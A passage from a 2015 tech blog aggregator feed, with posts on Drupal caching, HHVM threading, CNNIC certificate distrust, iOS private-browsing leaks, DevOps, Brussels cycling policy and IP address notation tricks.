  3. Drupal is all about reusable content and reusable components. That’s why starting in Drupal 8, we don’t attach assets at the page-level (i.e. global), but we attach them to the places where we actually need them (e.g. when rendering a taxonomy term, we attach the assets to style the taxonomy term to the taxonomy term’s render array). They then “bubble” the render tree, just like JavaScript events bubble the DOM tree. The assets bubble all the way to the response level, i.e. to a HTML response’s <head> element. Similarly, cache tags and contexts bubble to a response’s X-Drupal-Cache-Contexts and X-Drupal-Cache-Tags headers. 

  4. A cache tag is expensive if it’s invalidated relatively frequently (which causes all render cache items that have that tag to be invalidated). A cache context is expensive if it causes many variations (for example: per-user caching requires a variation of the render array to be created for every single authenticated user). 

  5. In Drupal 8, all assets are defined in asset libraries, which can contain any number of CSS or JS assets, and which can depend on other asset libraries. See d.o/theme-guide/8/assets

  6. Firefox’ 3D view is built using WebGL, not CSS Transforms. We might eventually need that too, but not just yet. Oh, and for the origins of Firefox’ 3D view, see

by Wim Leers at April 07, 2015 08:37 AM

April 06, 2015

Mattias Geniar

HHVM’s Threading Difference – Not The Same as PHP-FPM

The post HHVM’s Threading Difference – Not The Same as PHP-FPM appeared first on

I'm glad Etsy found this before the rest of us had to.

Most PHP SAPIs are implemented such that each request is handled by exactly one process, with many processes simultaneously handling many requests.

HHVM is a threaded SAPI. HHVM runs as a single process with multiple threads where each thread is only handling exactly one request. When you call setlocale(3) in this context it affects the locale for all threads in that process. As a result, requests can come in and trample the locales set by other requests as illustrated in this animation.
Code as Craft -- Etsy blog

HHVM pays of. It's more than twice as fast as PHP 5.4 in my benchmarks. But, it's not a drop-in replacement for PHP-FPM.

As with everything: testing, testing & testing.

The post HHVM’s Threading Difference – Not The Same as PHP-FPM appeared first on

by Mattias Geniar at April 06, 2015 05:02 PM

April 05, 2015

Mattias Geniar

The Irony of Random Passwords For Each Service

The post The Irony of Random Passwords For Each Service appeared first on

It's still better than the same password for every service, of course. But there's a catch.

Shifting Trust

Here's what most websites look like for their users.

+------------+ +                                          
|  facebook  | |                                          
+------------+ |           +-----------------------------+
+------------+ |           |                             |
|  twitter   | +----------->     gmail / hotmail / ...   |
+------------+ |           |                             |
+------------+ |           +-----------------------------+
|  instagram | |                                          
+------------+ +                                          

Nearly every service you sign up to, you use the same e-mail account. Because it's impractical to have a different account for each service.

So you're shifting the Single Point of Failure. It's no longer the same password you use on every website, it's the same e-mail address you use for every website. Password reset mails are all sent to that account.

Sure, a Gmail or Hotmail account is a lot safer if you enable 2-factor authentication. It's especially safer than the next hot startup that's using accounts on their service.

By all means, keep using random passwords for every service you sign up to. But be aware of the implications of using your same e-mail account on every service. Do whatever is possible to protect your e-mail account, as it's a goldmine.

Trusting The Untrustables

Last few years however, another shift has emerged. One that has the exact same consequences -- possibly even more dangerous ones -- than the one show above.

+------------+ +                                          
|  spotify   | |                                          
+------------+ |           +-----------------------------+
+------------+ |           |                             |
| | | +--------->   facebook / twitter auth   |
+------------+ |           |                             |
+------------+ |           +-----------------------------+
|  ...       | |                                          
+------------+ +                                          

More and more services are using signups with oAuth's, placing the trust of account management and security into the hands of others. Mostly Facebook and Twitter, with Github on the rise in the coding and open source community.

No more random passwords for each service. That's a good thing, right?

Now you're placing all your trust into a master password set in your Facebook or Twitter account. If that account is compromised, everything is compromised.

The Future

There's no good solution for this problem. If you're paranoid, make a new email account for every service. Give that new email account a random password. Save it in your memory/brain. Don't trust Password Managers. Don't trust post-its. Don't trust social media oAuth logins.

It's absolutely impractical. There is no proper solution. There's only the least bad one, which is probably to still use a random password for each service.

Oh well.

The post The Irony of Random Passwords For Each Service appeared first on

by Mattias Geniar at April 05, 2015 07:21 PM

April 03, 2015

Mattias Geniar

Hosting Superheroes

The post Hosting Superheroes appeared first on

I'm really excited about this animated video we are launching, to showcase what a Managed Hosting Provider can do.

It's always a bit of a challenge to explain to outsiders what my job entails. Hosting is a wide concept and a complex industry in IT. Hopefully, this small 60s video does a better job at explaining it than we do.

Outsourcing to a managed hosting provider, explained for dummies. I like.

The post Hosting Superheroes appeared first on

by Mattias Geniar at April 03, 2015 10:53 AM

Mozilla Blocking CCNIC’s CA Too

The post Mozilla Blocking CCNIC’s CA Too appeared first on

So it isn't just Google.

Sucks if you're ordering your certificates through one of their intermediates, and being duped because of this.

... after public discussion and consideration of the scope and impact of a range of options, we have decided to update our code so that Mozilla products will no longer trust any certificate issued by CNNIC’s roots with a notBefore date on or after 1st April 2015.

Distrusting New CNNIC Certificates


The chain of trust is only as strong as its weakest link. Especially with Certificate Authorities.

The post Mozilla Blocking CCNIC’s CA Too appeared first on

by Mattias Geniar at April 03, 2015 08:06 AM

Frank Goossens

WP YouTube Lyte 1.6.0: the one with the other API

I just released WP YouTube Lyte 1.6, featuring the following changes:

Proof the new player UI looks great;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

If you’re struggling to get a Google API key; there’s extensive information in the FAQ on the why, what & how. WP YouTube Lyte will automatically fall back to the old anonymous API v2 if you don’t provide a key. As API v2 will continue to work for a couple of more weeks, all will be fine. I am, in the mean time, working on a separate plugin that will automatically provide an API key for WP YouTube Lyte to use (and which in the future might offer other extra’s). You can contact me if you would be interested in test-driving that service-plugin.

by frank at April 03, 2015 05:19 AM

April 02, 2015

LOADays Organizers

LPI @ Loadays

As in previous years the Linux Professional Institute (LPI) wants to offer PBT LPI exams at loadays.

LPI Certifications are globally accepted certifications that are:

At loadays we want to offer certification for:

by Loadays Crew at April 02, 2015 10:00 PM

Mattias Geniar

Google’s War on China

The post Google’s War on China appeared first on

The timing of this is no accident. Google is pulling one of China's biggest Certificate Authorities from its products.

Update -- April 1: As a result of a joint investigation of the events surrounding this incident by Google and CNNIC, we have decided that the CNNIC Root and EV CAs will no longer be recognized in Google products.
Google Online Security

This reaction is the result of one of CCNIC's (China Internet Network Information Center) intermediates falsely issuing certificates for Google domains.

So what do you do if one of the 3 major browsers in existence blocks your Certificates, and thus your entire business? You reply. With a 2 line statement.

The decision that Google has made is unacceptable and unintelligible to CNNIC, and meanwhile CNNIC sincerely urge that Google would take users’ rights and interests into full consideration.
CCNIC's Announcement

The irony is that Google actually did consider their users' rights. That's why they're blocking the CA.

I don't think it's a coincidence Google is doing this just a few days after the largest DDoS Github ever faced was tracked back to a man-on-the-side attack launched from China.

If it isn't a cyber war yet, it soon will be.

The post Google’s War on China appeared first on

by Mattias Geniar at April 02, 2015 01:52 PM

April 01, 2015

Philip Van Hoof


Its a mythical beast that speaks in pornographic subplots and maintains direct communication with your girlfriends every wants and desires so as better to inform you on how to best please her. It has the feet of bonzi buddy, the torso of that man who uses 1 weird trick to perfect his abs, and the arms of the scientists that hate her. Most impressively, Maalwarkstrodon has a skull made from a Viagra, Levitra, Cialis, and Propecia alloy. This beast of malware belches sexy singles from former east-bloc soviet satellite states and is cloaked in the finest fashions from paris and milan, imported directly from Fujian china.

Maalwarkstrodon is incapable of offering any less than the best deals at 80% to 90% off, and will not rest until your 2 million dollar per month work-at-home career comes to fruition and the spoils of all true nigerian royalty are delivered unto those most deserving of a kings riches.

Maalwarkstrodon will also win the malware arms race.

by admin at April 01, 2015 10:32 PM

Mattias Geniar

µPuppet & Ensible

The post µPuppet & Ensible appeared first on

The future of config management has arrived.

Tiny-puppet burdens you with having to pass in parameters to configure your servers.

If you are a beginner, how will you ever figure out what those parameters even mean? With micro puppet you no longer need to pass in those pesky parameters. Micro puppet uses puppet's built-in DSL technology and code evaluation to introspect the environment and auto-populate those hash rockets for you. It's like magic! But we call it syntactic sugar.


It further improved Tiny Puppet to its ultimate goal. I've been blind for not having seen this coming.

And to spearhead the competition with µPuppet, there's now Ensible. A European fork of Ansible with very clear goals.

Ensible is a radically simple IT automation system. It handles configuration-management, application deployment, cloud provisioning, ad-hoc task-execution, and multinode orchestration -- including trivializing things like zero downtime rolling updates with load balancers.


Screw containers.

The future is µPuppet and Ensible, combined. Managing the same resources, because they both add value.

The post µPuppet & Ensible appeared first on

by Mattias Geniar at April 01, 2015 08:32 PM

Frank Goossens

Music from Our Tube: Young Fathers getting up

Young Fathers is, according to Wikipedia, an alternative hip-hop group based in Edinburgh, Scotland. But who cares about such silly trivia when you can just listen to their “Get Up” instead?

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at April 01, 2015 04:03 AM

March 31, 2015

Dries Buytaert

Content platform + user platform = BOOM!

Here is a very simple thesis on how to disrupt billion dollar industries:

Content platform + user platform = BOOM!

That is a bit cryptic, so let me explain.

Traditional retailers like RadioShack and Barnes & Noble were great "content platforms"; they have millions of products on shelves across thousands of physical stores. Amazon disrupted them by moving online, and Amazon was able to build an even better content platform with many more products. In addition, the internet enabled the creation of "user platforms". Amazon is a great user platform as it knows the interests of the 250 million customers it has on file; it uses that customer information to recommend products to buy. Amazon built a great content and user platform.

Businesses with a content platform that aren't investing in a user platform will most likely get disrupted. To understand why user platforms matter, take a look at a traditional media company like The New York Times -- one of the world's best content platforms, both online and offline. But it's also one of the world's poorest user platforms; they don't have a 1-on-1 relationship with all their readers. By aggregating the best content from many different sources, Flipboard is as good of a content platform as The New York Times, if not better. However, Flipboard is a much better user platform because all of its readers explicitly tell Flipboard what they are interested in and Flipboard matches content to users based on their interest. For The New York Times to survive, their strategy should be to invest in a better user platform: they should spend more time getting to know every single reader and serving curated content that matches the user's interest. The New York Times seems well aware of this problem, with its decision last week to host its articles directly on Facebook to get access to Facebook's user platform with 1.4 billion users.

Similarly, Netflix is disrupting both traditional broadcasters and cable companies because they built a great user platform capable of matching movies and shows to users. To many Netflix users' frustrations, traditional TV broadcasters still have the better content platform, but that hasn't stopped the growth of Netflix. Furthermore, Netflix is investing heavily in becoming a better content platform by producing their own shows, including original series such as House of Cards and Orange Is the New Black. Unless traditional broadcasters invest in becoming great user platforms and matching content to users, they risk losing against Netflix.

The challenge for newspaper organizations or cable providers is usually not with the technical evolution, but with changing their business model. Take the cable providers, for example. Legacy constraints like distribution models, FCC regulations and broadcast spectrum requirements prevent them from moving as fast in this direction as a Netflix might. Fortunately for most cable providers, they are also the internet providers, which allows them to become user platforms if they too can master the personalization and contextualization equation.

Facebook, Twitter and Google are some of the world's best user platforms; they know about their users' likes and dislikes, their location, their relationships and much more. For them, the opportunity is to become better content platforms and to match users with relevant products and articles. By organizing the world's information, Google is building a massive content platform, and by launching services like Gmail, Google+, Google Ads, Google Fiber and Google Wallet, they are building a massive user platform. Given that they have the world's largest content platform and the richest user platform, I have no doubt that Google could dominate the web the next couple of decades.

The examples above are focused on print media, television and radio, but the thinking can easily be extended to commerce, manufacturing, education, and much more. The thesis of content platforms adding user platforms (or vice versa) is very basic but also very powerful. Adding user platforms to existing content platforms enables a transformative change in the customer's user experience: content can find you, rather than you having to find content. Furthermore, brands are able to establish a 1-on-1 relationships with their customers allowing them to interact with them in a way they were never able to in the past. By establishing 1-on-1 relationships with their customers, brands will be able to "jump over" the traditional distribution channels. If we've learned one thing in the short history of the internet, it is that jumping over middlemen is a well-known recipe for success.

Anyone building a digital business should at least consider investing in building both a better content platform and a better user platform. It's no longer just about publishing content; it's about understanding what uniquely delights each user and using that information to manage the entire experience of a site visitor or customer over time. The idea of using interests, location, user feedback, past behavior and contextual information to deliver the best user experience is no longer a nice-to-have; it is becoming a make-or-break point. It is the next big challenge and opportunity for everyone building digital experiences. This is why I'm passionate about content management systems needing to evolve to digital experience management systems and why Acquia has spent the last two years building software that helps organizations build user platforms. As I talked and wrote about years ago, I believe personalization and contextualization will be a critical building block of the future of the web, and I'm excited to help make that a reality.

by Dries at March 31, 2015 08:05 PM

Mattias Geniar

Obsessive Efficiency Disorder

The post Obsessive Efficiency Disorder appeared first on

It's a bit like OCD, but more efficient.[1]

Having had a few talks with colleagues about this, it's clear I'm not alone. In fact, many of us who are working at a high pace and functioning at a high level seem to experience this.

We have the need to constantly find the most efficient way to get a task done. No matter how small or big the task is.

Small Efficient Routines

I notice this behaviour mostly in my common routines. The little things you repeat on a daily basis.

For instance, it takes around 1 minute for my coffee to be ready at the office. The machine also needs a 10-15 second warm-up, when it hasn't been powered on yet for the day.

So that leaves me with 2 options: I either wait for my coffee to be ready and continue my day, or I try to be more efficient. I chose the latter. Those 60 seconds during which my coffee is carefully prepared, I can setup my laptop, start unloading the dishwasher, ...


I just saved around 60 seconds.

Looks ridiculous, right?

Optimise Everything

The coffee example is perhaps an obvious one. If there are tasks in my day that consume more than 15 seconds, I'll probably do something else in the meanwhile. The delays are little enough that they don't warrant a multi-hour project for automating it entirely, so I must deal with the waiting.

For instance, this is my typical "git commit && git push" push routine. Committing code, pushing it upstream and starting a Pull Request.


Normally, one would git commit, wait for the pre-commit hook to validate everything, then start browsing the git repo and start the PR. As soon as the git commit is typed, I start working on the PR text.

There's no reason it should have to wait until my pre-commit hook is ready. Especially since I'm using a puppet pre-commit hook, that validates a lot, this is too time-consuming to wait on.

Single-tasking vs. Multitasking

I look for those kind of multitasking routines everywhere. But I don't like to consider it multitasking. It's more like sequentially single-tasking, you leave a task alone and start another one that takes just enough time to fill the gap.

There is a rule, though. The secondary task needs to be finished during that time period. I need to be able to put it out of my head, as soon as it's finished. That way, I don't get distracted with too many tasks actually running at the same time.

This is micro-optimisation. All day long.

ADHD vs. Concentration

You may think of this as some form of ADHD. Well, it isn't.

I deliberately chose to start a new, small, task during my waits. Tasks that I know I can finish during that timeframe. I'm not distracted, just highly focussed on getting it done. It even acts like a personal deadline, I know how much time task A will keep me waiting, so whichever task B I start in the meantime needs to be finished before task A requires my attention again.

You're Nuts

I don't think so. In fact, I believe many people in IT are doing this exact same thing.

It comes from a necessity. Most of us have extremely busy jobs and schedules. We need ways to optimise the time we spend every day, to make the most of out of it.

If you've already improved or automated the big inefficient tasks in life, then what's left besides a lot of small tasks in which to find more efficient methods?

Distractions Are Killers

This kind of jumping from task to task does take its toll. If you're distracted halfway a routine, it can end up taking more time than doing each task sequentially. A coworker asking a question, a push notification on your phone, an e-mail popup on the desktop, ... a lot of things can interfere with your flow.

I find that if I'm in my zone and am actively blocking outside incentives, this constant switching between small tasks to fill the waiting-gaps is helping me get a lot more done in a day. It takes more energy and more focus, but that's exactly the kind of tradeoff I'm looking to make.

[1] A joke, obviously.

The post Obsessive Efficiency Disorder appeared first on

by Mattias Geniar at March 31, 2015 06:00 PM

March 30, 2015

Luc Stroobant

Fietsbeleid is meer dan paaltjes zagen

In november heb ik na mij toch wel een jaar of 3 ergeren aan hoe levensgevaarlijk het fietspad op de Tweestationsstraat in Anderlecht eindigt volgende tweet geplaatst.

Alle aangesproken politici hebben hier op gereageerd dat de situatie onaanvaardbaar is (Pascal Smet die politiek verantwoordelijk is, zat helaas niet op Twitter). Intussen zijn we 4 maand later en ik weet ook wel dat politiek in Brussel heel traag dingen in beweging krijgt. Maar waar ik mij nogal aan erger is dat men blijkbaar wél snel kan reageren als een filmpje over gevaarlijke paaltjes viraal gaat. Beste Brusselse politici, met wat paaltjes zagen wordt er niks gedaan aan de zeer gevaarlijke situaties op verschillende essentiele invalswegen tussen de grote en de kleine ring. Als je echt minder files wil en mensen op de fiets wil krijgen, doe daar dan eens iets aan!

Als ik dan zinnen lees als "De administratie doet haar werk en heeft sinds 2013 een fietspadencontroleur in dienst", gaan mijn tenen helemaal krullen. Komt die controleur wel eens buiten het centrum? Fietst die zelf? Heeft hij of zij zich op de Tweestationsstraat al eens afgevraagd waarom daar zoveel fietsers op het al zeer drukke voetpad rijden? In Brussel geldt nu eenmaal de wet van de sterkste: auto's nemen alle ruimte in, dus voor de fietsers blijft de optie in de file of op het voetpad. Sorry, beste voetganger.
Maar zou het echt zo een drama zijn als we op die laatste 600 meter tussen het centrum en het einde van het bestaande fietspad een rijstrook vervangen door een fietspad en de file die daar toch altijd staat 500m richting Anderlecht industrie schuiven? Misschien kan je wel een paar mensen in de file overtuigen om de fiets te nemen als ze dat waanzinnig laatste stuk niet meer moeten overbruggen? Want een fietspad op de kleine ring, dat is wel mooi, maar wie van daar buiten komt moet er ook wel geraken zonder zich te verongelukken.

Met hoopvolle groeten van een fietser met een metalen plaat en 12 schroeven in zijn bovenarm. Met dank aan de "fietsvriendelijk" vernieuwde Gentsesteenweg in Sint-Agatha-Berchem.


by luc at March 30, 2015 05:36 PM

March 29, 2015

Ruben Vermeersch

An API is only as good as its documentation.

Your APIs are only as good as the documentation that comes with them. Invest time in getting docs right. — @rubenv on Twitter

If you are in the business of shipping software, chances are high that you’ll be offering an API to third-party developers. When you do, it’s important to realize that APIs are hard: they don’t have a visible user interface and you can’t know how to use an API just by looking at it.

For an API, it’s all about the documentation. If an API feature is missing from the documentation, it might as well not exist.

Sadly, very few developers enjoy the tedious work of writing documentation. We generally need a nudge to remind us about it.

At Ticketmatic, we promise that anything you can do through the user interface is also available via the API. Ticketing software rarely stands alone: it’s usually integrated with e.g. the website or some planning software. The API is as important as our user interface.

To make sure we consistently document our API properly, we’ve introduced tooling.

Similar to unit tests, you should measure the coverage of your documentation.

After every change, each bit of API endpoint (a method, a parameter, a result field, …) is checked and cross-referenced with the documentation, to make sure a proper description and instructions are present.

The end result is a big documentation coverage report which we consider as important as our unit test results.

Constantly measure and improve the documentation coverage metric.

More than just filling fields

A very important things was pointed out while circulating these thoughts on Twitter.

Shaun McCance (of GNOME documentation fame) correctly remarked:

@rubenv I’ve seen APIs that are 100% documented but still have terrible docs. Coverage is no good if it’s covered in crap. — @shaunm on Twitter

Which is 100% correct. No amount of metrics or tooling will guarantee the quality of the end-result. Keeping quality up is a moral obligation shared by anyone in the team and that can never be replaced with software.

Nevertheless, getting a slight nudge to remind you of your documentation duties never hurts.

Comments | @rubenv on Twitter

March 29, 2015 09:39 AM

March 28, 2015

Les Jeudis du Libre

Mons, le 23 avril – Tulip : un logiciel OpenSource de visualisation de données

Image Big Data WikimediaCe jeudi 23 avril 2015 à 19h se déroulera la 38ème séance montoise des Jeudis du Libre de Belgique.

Le sujet de cette séance : Tulip : un logiciel OpenSource de visualisation de données

Thématique : Big data

Public : Tout public

L’animateur conférencier : David Auber (LaBRI, Université Bordeaux I)

Lieu de cette séance : Université de Mons, Faculté Polytechnique, Site Houdain, Rue de Houdain, 9, auditoire 12 (cf. ce plan sur le site de l’UMONS, ou la carte OSM). Entrée par la porte principale, au fond de la cour d’honneur. Suivre le fléchage à partir de là.

La participation sera gratuite et ne nécessitera que votre inscription nominative, de préférence préalable, ou à l’entrée de la séance. Merci d’indiquer votre intention en vous inscrivant via la page La séance sera suivie d’un verre de l’amitié (le tout sera terminé au plus tard à 22h).

Les Jeudis du Libre à Mons bénéficient aussi du soutien de nos partenaires : CETIC, Normation, OpenSides, MeaWeb, NextLab, Phonoid et Creative Monkeys.

Si vous êtes intéressé(e) par ce cycle mensuel, n’hésitez pas à consulter l’agenda et à vous inscrire sur la liste de diffusion afin de recevoir systématiquement les annonces.

Pour rappel, les Jeudis du Libre se veulent des espaces d’échanges autour de thématiques des Logiciels Libres. Les rencontres montoises se déroulent chaque troisième jeudi du mois (sauf exception comme cette fois), et sont organisées dans des locaux et en collaboration avec des Hautes Écoles et Facultés Universitaires montoises impliquées dans les formations d’informaticiens (UMONS, HEH et Condorcet), et avec le concours de l’A.S.B.L. LoLiGrUB, active dans la promotion des logiciels libres.

DescriptionTulip est un logiciel OpenSource dédié à l’analyse et à la visualisation de données. L’objectif est de fournir aux développeurs une bibliothèque complète pour mettre en place des visualisations interactives de données. Dans cette présentation nous détaillerons les possibilités du logiciel en présentant: son modèle de stockage de données, ses algorithmes et ses visualisations. Nous aborderons aussi les possibilités d’extension de ce logiciel via son mécanisme de greffon et l’environnement de développement Python intégré dans celui-ci.

by Didier Villers at March 28, 2015 04:19 PM

March 27, 2015

Philip Van Hoof

It’s not the despair, Laura.

I can take the despair. It’s the hope I can’t stand. ~ Brian Stimpson, Clockwise ‘

by admin at March 27, 2015 11:49 PM

Les Jeudis du Libre

Arlon, le 2 avril : Première organisation et prise de contact

L’ASBL 6×7 se lance dans l’aventure des Jeudis du Libre et programme sa première organisation de ces jeudis du Libre d’Arlonpaur une prise de contact
avec cet écosystème, ce jeudi 2 avril 2015 à 19h.

Nous aborderons les principales thématiques, qu’est-ce que le Logiciel Libre, à quoi ça ressemble, comment participer, comment se l’approprier.

Rendez-vous ce jeudi pour ce premier contact, que vous soyez novice ou
passionné, vos idées dirigerons nos prochaines rencontres !

Inscriptions et renseignement complémentaires sur cette page.

by Didier Villers at March 27, 2015 07:30 PM

March 26, 2015

Paul Cobbaut

black beer

There is always room for beer (linky).

Inglorious Quad : excellent !
Oesterstout: excellent !
Embrasse: very good.
Zumbi: excellent !
Barbe Noire: very good.

by Paul Cobbaut ( at March 26, 2015 09:12 PM

Frank Goossens

Music from Our Tube; Bela Lugosi’s dead by lots of guys

Bela Lugosi’s Dead is one of the most famous Bauhaus-tracks and is (according to Wikipedia) often considered as the first gothic rock record to have been released. But here you can see and hear a live version by TV on the Radio, Trent Reznor (Nine Inch Nails) and Bauhaus’ Peter Murphy himself. Great stuff!

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at March 26, 2015 04:05 PM

March 25, 2015

Mattias Geniar

Belgium Leader in IPv6 Adoption

The post Belgium Leader in IPv6 Adoption appeared first on

According to Akamai, at least.

European countries continued to be heavily dominant, taking 8 of the 10 spots. Newcomer Norway, with an 88% quarter-over-quarter jump in IPv6 traffic, pushed France out of the top 10.

Belgium again maintained its clear lead, with 32% of content requests made over IPv6 — more than double the percentage of second-place Germany.

Source: akamai’s [state of the internet] 2014

10 points to Belgium! More than 30% of all requests to Akamai are running over IPv6. That's impressive.

IPv6 Traffic Percentage, Top Countries/Regions

Worldwide, Telenet, Brutele and Belgacom are all present in the top 20.


IPv6 adoption is really speeding up in Belgium.

The post Belgium Leader in IPv6 Adoption appeared first on

by Mattias Geniar at March 25, 2015 03:45 PM

March 24, 2015

Frank Goossens

iBert droomt; schaf de NMBS af!

een niet zelfrijdende peseroEen mens moet durven dromen! Bert Van Wassenhove deed dat ook en in zijn “Laat ons een begin maken met de ontmanteling van de NMBS” stelt hij dan ook voor om treinen te vervangen door -zoals een innovatie-minnende entrepreneur betaamt- zelfrijdende busjes van Google, Apple, BMW of Tesla.

De kern van zijn betoog (mijn samenvatting, lees het artikel vooral zelf):

De NMBS kost te veel en de reizigers zijn ontevreden door vertragingen en andere problemen. De trein kan onze mobiliteitsproblemen dus blijkbaar niet oplossen. De spoorwegen zijn immers een concept uit de industriële revolutie, want we rijden al lang niet meer met z’n allen naar één kantoorgebouw of fabriek naast een station in Brussel. Vandaag zijn er andere revoluties aan de orde die een oplossing kunnen brengen; zelfrijdende busjes die zoals de Pesero’s in Mexico-city volledig vrije-marktgestuurd reizigers oppikken waar het meeste vraag is.

Ik schreef (een deel van) deze blogpost op de vroege dubbeldekker tussen Lokeren en Brussel. De bezetting: pakweg 1.000 pendelaars. We zijn vanzelfsprekend niet de enige trein die van/ naar Brussel rijdt; cijfers van 2013 geven een dagelijks gemiddelde van 180.000 instappende reizigers in de Brusselse stations en het merendeel daarvan (120.000?) zal er ongetwijfeld tijdens de piekuren moeten op- en op de terugweg weer uitstappen. Volgens andere cijfers telt Brussel in totaal 330.000 pendelaars, die dus met openbaar vervoer of de auto komen. Je moet geen doordachte transport-economische analyses maken om hieruit te besluiten dat een héél grote groep mensen nog steeds en masse “naar één kantoorgebouw of fabriek naast een station in Brussel” moet en dat er zonder de trein dan ook bijna de helft meer auto’s in en rond Brussel zouden rijden. De trein vervoert volgens de cijfers van statbel overigens jaar na jaar meer reizigers, met tussen 1997 en 2010 een stijging van 144 naar 224 miljoen reizigers. Dat kan tellen, als (significante bijdrage aan) het verlichten van het mobiliteitsprobleem? Het nadeel; net zoals het wegverkeer, is de trein tijdens de piekuren oververzadigd en dat zorgt inderdaad voor heel wat problemen.

Met die cijfers van de benodigde (piek-)capaciteit in het achterhoofd lijkt inzetten van al dan niet zelfrijdende Pesero’s dan ook een utopie; 120.000 mensen in Brussel afzetten/ oppikken, gerekend aan een capaciteit van pakweg 10 passagiers per busje, dat geeft al snel 12.000 extra busjes in en rond Brussel tijdens de ochtend- en avondpiek. Indien we, zoals Bert voorstelt, één trein-traject als test zouden vervangen door een vloot aan Pesero’s en dat toepassen op “mijn” lijn (Sint-Niklaas -> Brussel -> Kortrijk), dan zouden alleen al voor het deel-traject tot en met Brussel 100 busjes moeten rijden om de 1.000 pendelaars op het piekuur tot in de hoofdstad te krijgen. Ik weet niet wat U, maar ik zou de impact daarvan op de mobiliteit liever niet in de praktijk testen.

Maar het artikel van Bert is niet zonder verdienste; terwijl 100 pesero’s met die ex-treinreizigers van Sint-Niklaas, Lokeren en Dendermonde het fileprobleem alleen maar erger zouden maken, kunnen diezelfde 100 zelfrijdende busje ook 1000 personenwagens vervangen en dus voor aanzienlijk minder drukte op de weg zorgen. Dat zou nog eens een bijdrage aan de oplossing van het mobiliteitsprobleem zijn!

Blijft het probleem van grote groepen mensen die op ongeveer hetzelfde moment op ongeveer dezelfde plaats moeten zijn en daar komen we bij de droom die Bert al als realiteit ziet; wat als we inderdaad niet meer met z’n allen naar één kantoorgebouw of fabriek naast een station in Brussel zouden moeten komen? Want (nog) meer thuis, decentraal of lokaal werken is inderdaad de enige fundamentele oplossing voor de capaciteitsproblemen tijdens de piekuren van zowel de auto- als spoorwegen. Hoe kunnen we grote en kleinere bedrijven en hun werknemers daarvan overtuigen? Misschien is dat juist Bert zijn ultieme bedoeling; het probleem erger maken door de spoorwegen af te schaffen om zo een mentaliteitswijziging af te dwingen? Een sluwe dromer, die iBert!

by frank at March 24, 2015 06:18 AM

March 23, 2015

Mattias Geniar

When Private Browsing Isn’t Private On iOS: HTML5 And AirPlay

The post When Private Browsing Isn’t Private On iOS: HTML5 And AirPlay appeared first on

Private Browsing: the illusion of privacy.

This applies to mobile devices that use iOS (iPhone, iPad). They have have a peculiar way of handling a "private" session.


Shared HTML5 Storage

It's actually explained in the incognito FAQ, but HTML5 storage on those iOS devices have a shared state. Everything stored in HTML5 storage in Incognito Mode can be accessed in normal mode.

... regular and incognito mode tabs share HTML5 local storage in iOS devices. HTML5 websites can access their data about your visit in this storage area.

Source: Browse in private

This mostly shows when websites use the HTML5 local storage for searchbox completion or store the session state of games. In most common use cases, you won't notice. Mainly because HTML5 Local Storage isn't that widely adopted yet.

AirPlay Cache

Apple devices have the ability to use AirPlay to stream audio and video to a remote receiver, like a stereo (Airport Express) or a TV (Apple TV).

When you start such a session in Incognito Mode and stream your audio or video, and later close that session, the Airplay cache will still hold the filename/title of the media item you most recently played.

For instance, if you play Psy's Gangnam Style on an iOS device in Incognito mode, close the tab and continue browsing in Regular Mode, the Airplay info screen will still show you the filename/title of the movie last played.


This meta info of the media played is only removed after you forcefully close the browser.


Closing the tab isn't enough. This meta info will also be broadcast to any remote device you have connected, be it an Apple TV, Airport Express or in-car entertainment that syncs with AirPlay.

It Could Be Worse

Sure, it's not as bad as storing Incognito URLs in a plain DB file like Safari does, but it just goes to show: Incognito Mode isn't really incognito. It's perfect for testing websites in a fresh environment though.

Regardless of server-side user matching, man-in-the-middle proxies and network sniffers, even local devices can't separate regular vs incognito mode properly. Don't use Incognito Mode for anything you don't want people to know. Expect, one day, to see your Incognito Browsing habbits to be made public.

Make sure you don't have to be (too) ashamed.

The post When Private Browsing Isn’t Private On iOS: HTML5 And AirPlay appeared first on

by Mattias Geniar at March 23, 2015 09:10 PM

March 22, 2015

Mattias Geniar

Life Without Ops

The post Life Without Ops appeared first on

Have you ever done a Puppet run with the --noop option? It does what the name implies: nothing.

Use 'noop' mode where the daemon runs in a no-op or dry-run mode. This is useful for seeing what changes Puppet will make without actually executing the changes.

This is exactly what happens if you have no Ops. Nothing.

Startup Mentality

Not everyone is the same. Neither is every startup. However, I see more and more startups misinterpreting what DevOps is all about. They are publicly looking to hire Developers with a bit of sysadmin knowledge, and expect that to be DevOps.

That's like asking a carpenter to also fix your leaky plumbing.

DevOps isn't about developers doing your system administration. Neither is it letting your sysadmins perform development related tasks. You can have the DevOps spirit and still have those 2 perfectly defined job roles.

DevOps however preaches communication. Breaking silo's. Having Dev and Ops work together. Learning from each other. Complementing each other. Not doing each other's work.

Why Ops Exist

It's so easy to implement some complex Puppet modules and have them working. But do you know what you're doing? What happens when your downloaded modules fail on you, and a few months in your ElasticSearch suddenly breaks? Of you've reached the limits of your MongoDB setup? Or you suddenly realise Redis is singlethreaded?

This is what Ops are for. They've fought the battle. They know what the bottlenecks are, because they've experienced them. Server-side. They know what happens to the network, the disk I/O, the memory and the CPU cycles whenever you reindex your SOLR cores.

This isn't knowledge to take for granted. You can't expect a fulltime developer, with basic knowledge of systems administration, to have the same level of experience. And maybe you don't expect it. Maybe it's OK in the first few months.

But here's my plea I'm hoping you'll understand: go take advice from experienced system administrators. Find someone with battle scars, that's walked the walk. If you can't find it in-house, consider outsourcing. Or plain one-off consultancy.

There's a reason Ops exist. It isn't to cost you money, it's to help you save money in the long run.

The post Life Without Ops appeared first on

by Mattias Geniar at March 22, 2015 08:11 PM

Silly Little IP Tricks

The post Silly Little IP Tricks appeared first on

I'll show you a few things you can do with IP addresses you may not know yet. They aren't new -- just part of the RFC -- but you don't encounter them that often.

Octal values

For instance, did you know that if you prefix an IP address with 0's, they get treated like Octal values? Spot the conversion in the ping below.

$ ping
PING ( 56 data bytes
Request timeout for icmp_seq 0

You would've expected the ping request to go to the IP ending in .36, instead if went to .30. Why? Because 036 is actually the octal value for the decimal 30.

Straight Up Integers

IP addresses are formed out of binary sequences, we know this. The binary forms get translate to decimals, for readability.

$ ping 3253719844
PING 3253719844 ( 56 data bytes
64 bytes from icmp_seq=0 ttl=57 time=17.003 ms

Pinging to an integer, like 3253719844, actually works. In the background, it's converted to the real IP notation of

Let's Hex It

You probably saw this coming. If you can ping the integer notation of an IP, would the HEX value work?

